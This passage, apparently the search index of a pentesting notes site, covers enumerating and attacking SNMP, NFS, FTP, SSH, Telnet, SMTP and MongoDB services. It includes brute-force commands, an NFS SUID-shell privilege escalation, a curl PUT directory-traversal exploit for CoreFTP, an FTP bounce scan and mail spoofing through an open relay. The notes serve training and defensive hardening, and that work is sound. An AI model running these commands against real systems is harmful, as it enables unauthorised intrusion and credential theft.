                        How can interception happen? Community strings can be seen as passwords that are used to determine whether the requested information can be viewed or not. It is important to note that many organizations still use SNMPv2, as the transition to SNMPv3 can be very complex while the services need to remain active. SNMP community strings provide information and statistics about a router or device. The manufacturer default community strings of public and private are often left unchanged. In SNMP versions 1 and 2c, access is controlled using a plaintext community string, and if we know the name, we can gain access to it. Examination of process parameters might reveal credentials passed on the command line, which might be possible to reuse for other externally accessible services, given the prevalence of password reuse in enterprise environments. Routing information, services bound to additional interfaces, and the version of installed software can also be revealed.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#footprinting-snmp","title":"Footprinting SNMP","text":"

                        There are tools like snmpwalk, onesixtyone, and braa.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#snmpwalk","title":"snmpwalk","text":"

                        snmpwalk is used to query the OIDs with their information. It retrieves a subtree of management values using SNMP GETNEXT requests.

                        snmpwalk -v2c -c public $ip\n
                        snmpwalk -v 2c -c public $ip 1.3.6.1.2.1.1.5.0\n
                        snmpwalk -v 2c -c private $ip\n

                        If we do not know the community string, we can use onesixtyone and SecLists wordlists to identify these community strings.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#onesixtyone-fast-and-simple-snmp-scanner","title":"onesixtyone - Fast and simple SNMP scanner","text":"

                        A tool such as onesixtyone can be used to brute force the community string names using a dictionary file of common community strings such as the dict.txt file included in the GitHub repo for the tool.

                        onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt $ip\n

                        When certain community strings are bound to specific IP addresses, they are named with the hostname of the host, and sometimes even symbols are added to these names to make them more challenging to identify.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#braa","title":"braa","text":"

                        Knowing a community string, we can use braa to brute-force the individual OIDs and enumerate the information behind them.

                        braa <community string>@$ip:.1.3.6.*   \n\n    # Example:\n    # braa public@10.129.14.128:.1.3.6.*\n
                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#installing-snmp","title":"Installing SNMP","text":"

                        The default configuration of the SNMP daemon is located at /etc/snmp/snmpd.conf. It contains basic settings for the service, which include the IP addresses, ports, MIB, OIDs, authentication, and community strings. See specifics about the configuration of this file in the manpage.
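
                        A quick sketch for reviewing only the active settings, with comment and blank lines filtered out:

                        grep -v '^#' /etc/snmp/snmpd.conf | grep -v '^$'\n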

                        Some classic misconfigurations are:

                        • rwuser noauth: Provides access to the full OID tree without authentication.
                        • rwcommunity <community string> <IPv4 address>: Provides access to the full OID tree regardless of where the requests were sent from.
                        • rwcommunity6 <community string> <IPv6 address>: Same access as with rwcommunity, with the difference of using IPv6.
                        ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#more-about-snmp-versioning-and-security","title":"More about SNMP versioning and security","text":"

                        Source: wikipedia

                        SNMP is available in different versions, each of which has its own security issues. SNMPv1 sends passwords in clear text over the network; therefore, passwords can be read with packet sniffing. SNMPv2 allows password hashing with MD5, but this has to be configured. Virtually all network management software supports SNMPv1, but not necessarily SNMPv2 or v3. SNMPv2 was specifically developed to provide data security, that is, authentication, privacy, and authorization, but only SNMP version 2c gained the endorsement of the Internet Engineering Task Force (IETF), while versions 2u and 2* failed to gain IETF approval due to security issues. SNMPv3 uses MD5, the Secure Hash Algorithm (SHA), and keyed algorithms to offer protection against unauthorized data modification and spoofing attacks. If a higher level of security is needed, the Data Encryption Standard (DES) can optionally be used in cipher block chaining mode. SNMPv3 has been implemented on Cisco IOS since release 12.0(3)T. SNMPv3 may be subject to brute force and dictionary attacks for guessing the authentication or encryption keys if these keys are generated from short (weak) passwords or passwords that can be found in a dictionary.

                        ","tags":["SNMP","port 161","port 162"]},{"location":"1720-5060-5061-voip/","title":"Ports 1720, 5060 and 5061: VoIP","text":"

                        The most common VoIP ports are TCP/5060 and TCP/5061, which are used for the Session Initiation Protocol (SIP). However, the port TCP/1720 may also be used by some VoIP systems for the H.323 protocol, a set of standards for multimedia communication over packet-based networks. Still, SIP is more widely used than H.323 in VoIP systems.

                        The most common SIP requests and methods are:

                        • INVITE: Initiates a session or invites another endpoint to participate.
                        • ACK: Confirms the receipt of an INVITE request.
                        • BYE: Terminates a session.
                        • CANCEL: Cancels a pending INVITE request.
                        • REGISTER: Registers a SIP user agent (UA) with a SIP server.
                        • OPTIONS: Requests information about the capabilities of a SIP server or user agent, such as the types of media it supports.
                        "},{"location":"2049-nfs-network-file-system/","title":"Port 2049 - NFS Network File System","text":"

                        Network File System (NFS) is a network file system developed by Sun Microsystems and has the same purpose as SMB: to access file systems over a network as if they were local. However, it uses an entirely different protocol. NFS is used between Linux and Unix systems, which means that NFS clients cannot communicate directly with SMB servers.

                        NFS is an Internet standard that governs the procedures in a distributed file system. While NFS protocol version 3.0 (NFSv3), which has been in use for many years, authenticates the client computer, this changes with NFSv4. Here, as with the Windows SMB protocol, the user must authenticate.

                        The versions compare as follows:

                        • NFSv2: It is older but is supported by many systems and was initially operated entirely over UDP.
                        • NFSv3: It has more features, including variable file size and better error reporting, but is not fully compatible with NFSv2 clients.
                        • NFSv4: It includes Kerberos, works through firewalls and on the Internet, no longer requires portmappers, supports ACLs, applies state-based operations, and provides performance improvements and high security. It is also the first version to have a stateful protocol.

                        NFS is based on the Open Network Computing Remote Procedure Call (ONC-RPC/SUN-RPC) protocol exposed on TCP and UDP port 111, which uses External Data Representation (XDR) for the system-independent exchange of data. The NFS protocol itself has no mechanism for authentication or authorization; instead, authentication is shifted entirely to the RPC protocol's options.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#configuration-file","title":"Configuration file","text":"

                        The /etc/exports file contains a table of physical filesystems on an NFS server accessible by the clients.

                        The default exports file also contains some examples of configuring NFS shares. First, the folder is specified and made available to others, and then the rights they will have on this NFS share are connected to a host or a subnet. Finally, additional options can be added to the hosts or subnets.

                        The most common export options are:

                        • rw: Read and write permissions.
                        • ro: Read only permissions.
                        • sync: Synchronous data transfer. (A bit slower)
                        • async: Asynchronous data transfer. (A bit faster)
                        • secure: Ports above 1024 will not be used.
                        • insecure: Ports above 1024 will be used.
                        • no_subtree_check: This option disables the checking of subdirectory trees.
                        • root_squash: Assigns all permissions to files of root UID/GID 0 to the UID/GID of anonymous, which prevents root from accessing files on an NFS mount.

                        Take a closer look at the insecure option. It is dangerous because it allows clients to use source ports above 1024. Only root can use the first 1024 ports, so requiring a source port below 1024 ensures the request comes from a privileged process; with insecure set, any local user on the client can open a socket and interact with the NFS service.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#mounting-a-nfs-shared-folder","title":"Mounting a NFS shared folder","text":"
                        # Share the folder `/mnt/nfs` to the subnet $ip\necho '/mnt/nfs  $ip/24(sync,no_subtree_check)' >> /etc/exports\n\n# Restart the NFS service\nsystemctl restart nfs-kernel-server \n\nexportfs\n

                        We have shared the folder /mnt/nfs to the subnet IP/24 with the setting shown above. This means that all hosts on the network will be able to mount this NFS share and inspect the contents of this folder.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#footprinting-the-service","title":"Footprinting the service","text":"
                        sudo nmap $ip -p111,2049 -sV -sC\n\n# Also, run all NSE NFS scripts\nsudo nmap --script nfs* $ip -sV -p111,2049\n

                        Once we have discovered such an NFS service, we can mount it on our local machine. For this, we can create a new empty folder to which the NFS share will be mounted. Once mounted, we can navigate it and view the contents just like our local system.

                        # Show Available NFS Shares\nshowmount -e $ip\n\n# Mounting NFS Share\nmkdir target-NFS\nsudo mount -t nfs $ip:/ ./target-NFS/ -o nolock\ncd target-NFS\ntree .\n\n# List Contents with Usernames & Group Names\nls -l mnt/nfs/\n\n# List Contents with UIDs & GUIDs\nls -n mnt/nfs/\n\n# Unmount the shared\nsudo umount ./target-NFS\n

                        By default, the NFS server has the root_squash option enabled, which maps a client's root access to nobody:nogroup. If a share is exported with no_root_squash instead, becoming root on the client (sudo su) grants root-level access to its files.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#attacking-wrong-configured-nfs","title":"Attacking wrong configured NFS","text":"

                        It is important to note that if the root_squash option is set, we cannot edit the backup.sh file even as root.

                        We can also use NFS for further escalation. For example, if we have access to the system via SSH and want to read files from another folder that a specific user can read, we would need to upload a shell to the NFS share that has the SUID of that user and then run the shell via the SSH user.
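
                        A sketch of that technique for the root case, assuming the share is mounted locally at ./target-NFS and exported with no_root_squash (all paths are examples):

                        # On the attacker machine, plant a SUID copy of bash on the share\nsudo cp /bin/bash ./target-NFS/bash\nsudo chmod u+s ./target-NFS/bash\n\n# On the target, over the SSH session, run it with -p to keep the effective UID\n/mnt/nfs/bash -p\n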

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#more","title":"More","text":"

                        https://vk9-sec.com/2049-tcp-nfs-enumeration/.

                        ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"21-ftp/","title":"21 ftp","text":"

                        The File Transfer Protocol (FTP) is a standard communication protocol used to transfer computer files from a server to a client on a computer network. FTP is built on a client\u2013server model architecture using separate control and data connections between the client and the server. The FTP runs within the application layer of the TCP/IP protocol stack. Thus, it is on the same layer as HTTP or POP.

                        FTP users may authenticate themselves with a clear-text sign-in protocol, generally in the form of a username and password. However, they can connect anonymously if the server is configured to allow it. For secure transmission that protects the username and password and encrypts the content, FTP is often secured with SSL/TLS (FTPS) or replaced with SSH File Transfer Protocol (SFTP).

                        However, if the network administrators choose to wrap the connection with the SSL/TLS protocol or tunnel the FTP connection through SSH to add a layer of encryption that only the source and destination hosts can decrypt, this would successfully foil most Man-in-the-Middle attacks.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#how-it-works","title":"How it works","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#the-connection","title":"The connection","text":"

                        1. First, the client and server establish a control channel through TCP port 21. The client sends commands to the server, and the server returns status codes.

                        2. Then both communication participants can establish the data channel via TCP port 20. This channel is used exclusively for data transmission, and the protocol watches for errors during this process.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#active-and-passive-ftp","title":"Active and passive FTP","text":"

                        A distinction is made between active and passive FTP. In the active variant, the client establishes the connection as described via TCP port 21 and thus informs the server via which client-side port the server can transmit its responses. However, if a firewall protects the client, the server cannot reply because all external connections are blocked. For this purpose, the passive mode has been developed. Here, the server announces a port through which the client can establish the data channel. Since the client initiates the connection in this method, the firewall does not block the transfer.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#installation","title":"Installation","text":"

                        You may need to install ftp service. Run:

                        sudo apt install ftp -y\n

                        Then to connect with ftp, run:

                        ftp $ip \n

                        The prompt will ask us for the username we want to log in with. Here is where the magic happens. A typical misconfiguration for running FTP services allows an anonymous account to access the service like any other authenticated user. The anonymous username can be input when the prompt appears, followed by any password whatsoever since the service will disregard the password for this specific account.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#basic-usage","title":"Basic usage","text":"
                        # Connect with ftp\nftp $ip\n\n# If anonymous login is allowed, enter anonymous as user and press Enter when prompted for password\n\n# Give you a list of available commands\nhelp\n\n# List directories and files\nls\n\n# List recursively. Not always available, only in some configurations\nls -R\n\n# Change to a directory\ncd <folder>\n\n# Download a file to your localhost\nget <nameofFileInOrigin> <nameOfFileInLocalhost>\n\n# Upload a file from your localhost\nput <yourfile>\n\n# Exit connection\nquit\n\n# Connect in passive mode\nftp -p $ip\n# The `-p` flag in the `ftp` command on Linux is used to enable passive mode for the file transfer protocol (FTP) connection. Passive mode is a mode of FTP where the data connection is initiated by the client rather than the server. This can be useful when the client is behind a firewall or NAT (Network Address Translation) that does not allow incoming connections. \n

More possibilities with wget:

                        # Download all available files at once\nwget -m --no-passive ftp://anonymous:anonymous@$ip\n
                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#footprinting-with-nmap","title":"Footprinting with nmap","text":"
# Locate all ftp-related scripts\nfind / -type f -name ftp* 2>/dev/null | grep scripts\n\n# Run a general scanner for version, aggressive mode, and perform default scripts\nsudo nmap -sV -p21 -sC -A $ip\n# ftp-anon NSE script checks whether the FTP server allows anonymous access.\n# ftp-syst, for example, executes the `STAT` command, which displays information about the FTP server status.\n

                        See more about nmap for scanning, running scripts and footprinting

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#attacking-ftp","title":"Attacking FTP","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#brute-forcing-with-medusa","title":"Brute forcing with Medusa","text":"

                        Medusa Cheat sheet.

# Brute force FTP login\nmedusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp\n# -u: username\n# -U: list of usernames\n# -p: password\n# -P: list of passwords\n# -h: host/IP\n# -M: protocol to bruteforce\n

However, Medusa is very slow in comparison to Hydra:

                        # Example for ftp in a non default port\nhydra -L users.txt -P pass.txt ftp://$ip:2121\n
                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#ftp-bounce-attack","title":"FTP Bounce Attack","text":"

An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. For instance, consider we are targeting an FTP server FTP_DMZ exposed to the internet. Another device within the same network, Internal_DMZ, is not exposed to the internet. We can use the connection to the FTP_DMZ server to scan Internal_DMZ using the FTP bounce attack and obtain information about the server's open ports.

nmap -Pn -v -n -p80 -b anonymous:password@$ipFTPdmz $ipINTERNALdmz\n# -b: the Nmap -b flag performs an FTP bounce attack\n
                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#coreftp-server-build-725-directory-traversal-authenticated","title":"CoreFTP Server build 725 - Directory Traversal (Authenticated)","text":"

CVE-2022-22836 | exploit

                        Summary: This FTP service uses an HTTP POST request to upload files. However, the CoreFTP service allows an HTTP PUT request, which we can use to write content to files.

The exploit for this attack is relatively straightforward, based on a single cURL command.

                        curl -k -X PUT -H \"Host: <IP>\" --basic -u <username>:<password> --data-binary \"PoC.\" --path-as-is https://<IP>/../../../../../../whoops\n

We create a raw HTTP PUT request (-X PUT) with basic auth (--basic -u <username>:<password>), the path for the file (--path-as-is https://<IP>/../../../../../whoops), and its content (--data-binary \"PoC.\") with this command. Additionally, we specify the host header (-H \"Host: <IP>\") with the IP address of our target system.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#other-ftp-services","title":"Other FTP services","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#tftp","title":"TFTP","text":"

                        Trivial File Transfer Protocol (TFTP) is simpler than FTP and performs file transfers between client and server processes.

• Unlike FTP, it does not require user authentication and does not provide the other valuable features FTP supports.
• It uses UDP (port 69) instead of TCP.

                        Because of the lack of security, TFTP, unlike FTP, may only be used in local and protected networks.
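A quick way to footprint a TFTP service is the tftp-enum NSE script, which probes for a built-in list of commonly present file names over UDP 69; a minimal sketch:

sudo nmap -sU -p69 -sV --script tftp-enum $ip\n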

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#basic-usage_1","title":"Basic usage","text":"
                        # Sets the remote host, and optionally the port, for file transfers.\nconnect\n\n# Transfers a file or set of files from the remote host to the local host.\nget\n\n# Transfers a file or set of files from the local host onto the remote host\nput\n\n# Exits tftp\nquit\n\n# Shows the current status of tftp, including the current transfer mode (ascii or binary), connection status, time-out value, and so on\nstatus\n\n# Turns verbose mode, which displays additional information during file transfer, on or off.\nverbose \n\n# Unlike the FTP client, TFTP does not have directory listing functionality.\n
                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#vsftpd","title":"vsFTPd","text":"

                        One of the most used FTP servers on Linux-based distributions is vsFTPd.

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#installation_1","title":"Installation","text":"
                        sudo apt install vsftpd \n
                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#configuration-file","title":"Configuration file","text":"

                        The default configuration of vsFTPd can be found in /etc/vsftpd.conf.

| Setting | Description |
|---|---|
| listen=NO | Run from inetd or as a standalone daemon? |
| listen_ipv6=YES | Listen on IPv6? |
| anonymous_enable=NO | Enable anonymous access? |
| local_enable=YES | Allow local users to login? |
| dirmessage_enable=YES | Display active directory messages when users go into certain directories? |
| use_localtime=YES | Use local time? |
| xferlog_enable=YES | Activate logging of uploads/downloads? |
| connect_from_port_20=YES | Connect from port 20? |
| secure_chroot_dir=/var/run/vsftpd/empty | Name of an empty directory |
| pam_service_name=vsftpd | This string is the name of the PAM service vsftpd will use. |
| rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem | The last three options specify the location of the RSA certificate and key to use for SSL encrypted connections. |
| rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key | |
| ssl_enable=NO | |

                        In addition, there is a file called /etc/ftpusers that we also need to pay attention to, as this file is used to deny certain users access to the FTP service.
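The file simply lists one denied username per line; any account listed here is refused FTP login even with a valid system password. An illustrative example (the usernames are hypothetical):

cat /etc/ftpusers\n\nguest\njohn\nkevin\n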

                        ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"22-ssh/","title":"22 ssh","text":"

                        Secure Shell (SSH) enables two computers to establish an encrypted and direct connection within a possibly insecure network on the standard port TCP 22.

                        Implemented natively on all Linux distributions and MacOS, SSH can also be used on Windows, with an appropriate program. The well-known OpenBSD SSH (OpenSSH) server on Linux distributions is an open-source fork of the original and commercial SSH server from SSH Communication Security.

There are two competing protocols: SSH-1 and SSH-2. SSH-2 is more advanced than SSH-1 in terms of encryption, speed, stability, and security; for example, SSH-1 is vulnerable to MITM attacks, whereas SSH-2 is not.

                        The SSH server runs on TCP port 22 by default, to which we can connect using an SSH client. This service uses three different cryptography operations/methods: symmetric encryption, asymmetric encryption, and hashing.

                        ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#footprinting-ssh","title":"Footprinting ssh","text":"","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#ssh-audit","title":"ssh-audit","text":"
                        # Installation and execution\ngit clone https://github.com/jtesta/ssh-audit.git \n\n# Execute\ncd ssh-audit\n./ssh-audit.py $ip\n
                        ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#nmap","title":"nmap","text":"

                        Brute force script:

                        nmap $ip -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/nmap/nselib/data/passwords.lst\n

OpenSSH 7.6p1 Ubuntu ubuntu0.3 is well known for some vulnerabilities; OpenSSH versions before 7.7, for instance, are affected by the username enumeration flaw CVE-2018-15473.
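One way to test that enumeration flaw is the Metasploit scanner module for it; a sketch, assuming users.txt is your username wordlist:

msfconsole -q\nuse auxiliary/scanner/ssh/ssh_enumusers\nset RHOSTS $ip\nset USER_FILE users.txt\nrun\n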

                        ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#connect-with-ssh","title":"Connect with ssh","text":"
                        ssh <user>@$ip\n\n# connect with a ssh key\nssh -i id_rsa <user>@$ip\n
                        ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#installing-a-ssh-service","title":"Installing a ssh service","text":"

                        The sshd_config file, responsible for the OpenSSH server, has only a few of the settings configured by default. However, the default configuration includes X11 forwarding, which contained a command injection vulnerability in version 7.2p1 of OpenSSH in 2016.

                        Configuration file: /etc/ssh/sshd_config.

                        Common misconfigurations:

| Setting | Description |
|---|---|
| PasswordAuthentication yes | Allows password-based authentication. |
| PermitEmptyPasswords yes | Allows the use of empty passwords. |
| PermitRootLogin yes | Allows logging in as the root user. |
| Protocol 1 | Uses an outdated version of encryption. |
| X11Forwarding yes | Allows X11 forwarding for GUI applications. |
| AllowTcpForwarding yes | Allows forwarding of TCP ports. |
| PermitTunnel | Allows tunneling. |
| DebianBanner yes | Displays a specific banner when logging in. |

                        Some instructions and hardening guides can be used to harden our SSH servers.
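As a minimal hardening sketch, the risky defaults above can simply be inverted in /etc/ssh/sshd_config (restart the sshd service afterwards for the changes to take effect):

# /etc/ssh/sshd_config - minimal hardening sketch\nPasswordAuthentication no\nPermitEmptyPasswords no\nPermitRootLogin no\nX11Forwarding no\nAllowTcpForwarding no\n\n# then: sudo systemctl restart sshd\n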

                        ","tags":["pentesting","web pentesting","port 22"]},{"location":"23-telnet/","title":"23 telnet","text":"

                        Sometimes, due to configuration mistakes, some important accounts can be left with blank passwords for the sake of accessibility. This is a significant issue with some network devices or hosts, leaving them open to simple brute-forcing attacks, where the attacker can try logging in sequentially, using a list of usernames with no password input. Some typical important accounts have self-explanatory names, such as:

                        • admin
                        • administrator
                        • root

                        A direct way to attempt logging in with these credentials in hopes that one of them exists and has a blank password is to input them manually in the terminal when the hosts request them. If the list were longer, we could use a script to automate this process, feeding it a wordlist for usernames and one for passwords.

                        Typically, the wordlists used for this task consist of typical people names, abbreviations, or data from previous database leaks. For now, we can resort to manually trying these three main usernames above.
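If we do want to automate this, Hydra's -e n option additionally tries a null (empty) password for every username in the list; a sketch against the telnet service:

hydra -L users.txt -e n -t 4 -f $ip telnet\n# -e n: additionally try an empty password for each user\n# -f: stop after the first valid login is found\n# -t 4: limit parallel tasks to reduce the risk of lockouts\n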

                        ","tags":["telnet","port 23"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/","title":"Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)","text":"

The Simple Mail Transfer Protocol (SMTP) is a protocol for sending emails in an IP network. By default, SMTP servers accept connection requests on port 25. However, newer SMTP servers also use other ports such as TCP port 587. This port is used to receive mail from authenticated users/servers, usually using the STARTTLS command. SMTP works unencrypted without further measures and transmits all commands, data, or authentication information in plain text. To prevent unauthorized reading of data, SMTP is used in conjunction with SSL/TLS encryption. Under certain circumstances, a server uses a port other than the standard TCP port 25 for the encrypted connection, for example, TCP port 465.

                        Mail User Agent (MUA): SMTP client who sends the email. MUA converts it into a header and a body and uploads both to the SMTP server.

                        Mail Transfer Agent (MTA): The MTA checks the e-mail for size and spam and then stores it. At this point of the process, this MTA works as the sender's server. The MTA then searches the DNS for the IP address of the recipient mail server. On arrival at the destination SMTP server, the receiver's MTA reassembles the data packets to form a complete e-mail.

Mail Submission Agent (MSA): A proxy that occasionally precedes the MTA to relieve the load. It checks the validity, i.e., the origin, of the e-mail. This MSA is also called a relay server.

Mail Delivery Agent (MDA): It deals with transferring the email to the recipient's mailbox.

                        ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#extended-smtp-esmtp","title":"Extended SMTP (ESMTP)","text":"

Extended SMTP (ESMTP) deals with the two main shortcomings of the SMTP protocol:

                        • In SMTP, users are not authenticated, therefore the sender is unreliable.
                        • SMTP doesn't have confirmations.

For this, ESMTP uses TLS for encryption and the AUTH PLAIN extension for authentication.

                        ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#basic-commands","title":"Basic commands","text":"
                        # We can use telnet protocol to connect to a SMTP server\ntelnet $ip 25\n\n# AUTH is a service extension used to authenticate the client\nAUTH PLAIN  \n\n# The client logs in with its computer name and thus starts the session. It also lists all available commands\nEHLO\n    # Example: \n    # HELO mail1.inlanefreight.htb\n\n# The client names the email sender\nMAIL FROM   \n\n# The client names the email recipient\nRCPT TO\n\n# The client initiates the transmission of the email\nDATA \n\n# The client aborts the initiated transmission but keeps the connection between client and server\nRSET\n\n# The client checks if a mailbox is available for message transfer. This also means that this command could  be used to enumerate existing users on the system. However, this does not always work. Depending on how the SMTP server is configured, the SMTP server may issue `code 252` and confirm the existence of a user that does not exist on the system.\nVRFY\n# Example: VRFY root\n\n# The client also checks if a mailbox is available for messaging with this command \nEXPN\n\n# The client requests a response from the server to prevent disconnection due to time-out\nNOOP\n\n# The client terminates the session\nQUIT\n

If we are connected to a proxy and we want this proxy to connect to an SMTP server, the command that we would send then would look something like this:

                        CONNECT 10.129.14.128:25 HTTP/1.0\n

                        Example:

telnet $ip 25  \n\n# Trying 10.129.14.128...\n# Connected to 10.129.14.128. \n# Escape character is '^]'. \n# 220 ESMTP Server   \n\nEHLO inlanefreight.htb  \n# 250-mail1.inlanefreight.htb \n# 250-PIPELINING \n# 250-SIZE 10240000 \n# 250-ETRN \n# 250-ENHANCEDSTATUSCODES \n# 250-8BITMIME \n# 250-DSN \n# 250-SMTPUTF8 \n# 250 CHUNKING   \n\nMAIL FROM: <cry0l1t3@inlanefreight.htb>  \n# 250 2.1.0 Ok   \n\nRCPT TO: <mrb3n@inlanefreight.htb> NOTIFY=success,failure  \n# 250 2.1.5 Ok   \n\nDATA  \n# 354 End data with <CR><LF>.<CR><LF>  \n\n# From: <cry0l1t3@inlanefreight.htb> \n# To: <mrb3n@inlanefreight.htb> \n# Subject: DB \n# Date: Tue, 28 Sept 2021 16:32:51 +0200 \n\nHey man, I am trying to access our XY-DB but the creds dont work.  Did you make any changes there?.  \n# 250 2.0.0 Ok: queued as 6E1CF1681AB   \n\nQUIT  \n# 221 2.0.0 Bye\n# Connection closed by foreign host.\n
A dangerous Postfix setting is an open relay configuration, where the mynetworks option accepts mail from any source:

mynetworks = 0.0.0.0/0\n

                        With this setting, this SMTP server can send fake emails and thus initialize communication between multiple parties. Another attack possibility would be to spoof the email and read it.
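To confirm an open relay in practice, a tool such as swaks can attempt to deliver a spoofed message through the server; a sketch (the sender and recipient addresses below are hypothetical):

swaks --from spoofed@inlanefreight.htb --to victim@inlanefreight.htb --server $ip --body \"Open relay test\"\n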

                        ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#footprinting-smtp","title":"Footprinting SMTP","text":"
                        sudo nmap $ip -sC -sV -p25\n\nsudo nmap $ip -p25 --script smtp-open-relay -v\n

                        Scripts for user enumeration:

                        # Enumerate users:\nfor user in $(cat users.txt); do echo VRFY $user | nc -nv -w 6 $ip 25  ; done\n# -w: Include a delay in passing the argument. In seconds.\n

                        Results from script in user enumeration:

                        (UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n252 2.0.0 root\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n550 5.1.1 <lala>: Recipient address rejected: User unknown in local recipient table\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n252 2.0.0 robin                 \n
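The same enumeration can be done with the dedicated smtp-user-enum tool, which also supports the EXPN and RCPT methods:

smtp-user-enum -M VRFY -U users.txt -t $ip\n# -M: mode (VRFY, EXPN or RCPT)\n# -U: file of usernames to check\n# -t: target server\n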
                        ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#postfix-an-example-of-a-smtp-server","title":"Postfix, an example of a SMTP server","text":"","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#configuration-file","title":"Configuration file","text":"

                        See how to install postfix server.

The configuration file for the Postfix service is /etc/postfix/main.cf

                        ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"27017-27018-mongodb/","title":"27017 - 27018 mongoDB","text":"

                        https://book.hacktricks.xyz/network-services-pentesting/27017-27018-mongodb.

                        More about mongo.

                        ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#description","title":"Description","text":"

• 27017 - The default port for mongod and mongos instances. You can change this port with port or --port.
• 27018 - The default port for mongod when running with the --shardsvr command-line option or the shardsvr value for the clusterRole setting in a configuration file.

MongoDB is an open-source database management system (DBMS) that uses a document-oriented database model which supports various forms of data.

                        ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#to-connect-to-a-mongodb","title":"To connect to a MongoDB","text":"

                        More about mongo.

By default, MongoDB does not require a password. admin is a common default admin user in MongoDB databases.

                        mongo $ip\nmongo <HOST>:<PORT>\nmongo <HOST>:<PORT>/<DB>\nmongo <database> -u <username> -p '<password>'\n
                        ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#some-mongodb-commands","title":"Some MongoDB commands","text":"

                        More about mongo.

# Enter the mongodb shell\nmongo\n\n# See help\nhelp\n\n# Display databases\nshow dbs\n\n# Select a database\nuse <db>\n\n# Display collections in a database\nshow collections\n\n# Dump a collection\ndb.<collection>.find()\n\n# Return the number of records in the collection\ndb.<collection>.count() \n\n# Find in current db the username admin\ndb.current.find({\"username\":\"admin\"}) \n\n# We can dump the contents of the documents present in the flag collection by using the db.collection.find() command. Replace the collection name flag in the command and use pretty() to receive the output in a beautified format.\ndb.flag.find().pretty()\n
                        ","tags":["mongodb","port 27017","port 27018"]},{"location":"3128-squid/","title":"3128 Squid","text":"

                        Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic.

                        Squid is a widely used open-source proxy server and web cache daemon. It primarily operates as a proxy server, which means it acts as an intermediary between client devices (such as computers or smartphones) and web servers, facilitating requests and responses between them.

